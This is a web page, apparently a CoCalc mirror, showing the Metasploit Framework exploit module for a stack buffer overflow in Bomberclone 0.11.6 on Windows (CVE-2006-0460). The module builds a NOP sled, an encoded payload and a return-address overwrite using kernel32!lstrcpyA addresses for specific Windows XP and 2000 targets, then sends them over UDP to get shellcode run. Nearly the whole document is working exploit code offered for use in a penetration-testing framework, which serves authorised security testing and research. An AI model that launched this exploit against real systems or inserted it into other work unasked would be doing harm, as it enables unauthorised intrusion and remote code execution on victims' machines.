CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bomberclone_overflow.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Bomberclone 0.11.6 Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.

16
        The return address is overwritten with lstrcpyA memory address,

17
        the second and third value are the destination buffer,

18
        the fourth value is the source address of our buffer in the stack.

19
        This exploit is like a return in libc.

20


21
        ATTENTION

22
        The shellcode is exec ONLY when someone try to close bomberclone.

23
      },

24
      'Author'         => 'Jacopo Cervini <acaro[at]jervus.it>',

25
      'References'     =>

26
        [

27
          ['CVE', '2006-0460'],

28
          ['OSVDB', '23263'],

29
          ['BID', '16697']

30
        ],

31
      'Payload'        =>

32
        {

33
          'Space'    => 344,

34
          'BadChars' => "\x00"

35
        },

36
      'Platform'       => 'win',

37
      'Targets'        =>

38
        [

39
          ['Windows XP SP2 Italian',   { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA

40
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA

41
          ['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA

42
        ],

43
      'Privileged'     => false,

44
      'DisclosureDate' => '2006-02-16'

45
      ))

46


47
    register_options([ Opt::RPORT(11000) ])

48
  end

49


50
  def exploit

51
    connect_udp

52


53
    pattern  = make_nops(421)

54
    pattern << payload.encoded

55
    pattern << [ target.ret ].pack('V')

56
    pattern << "\x04\xec\xfd\x7f" * 2

57
    pattern << "\xa4\xfa\x22\x00"

58


59
    request  = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"

60


61
    print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret }...")

62


63
    udp_sock.put(request)

64
    udp_sock.get(5)

65


66
    handler(udp_sock)

67
    disconnect_udp

68
  end

69
end

70


71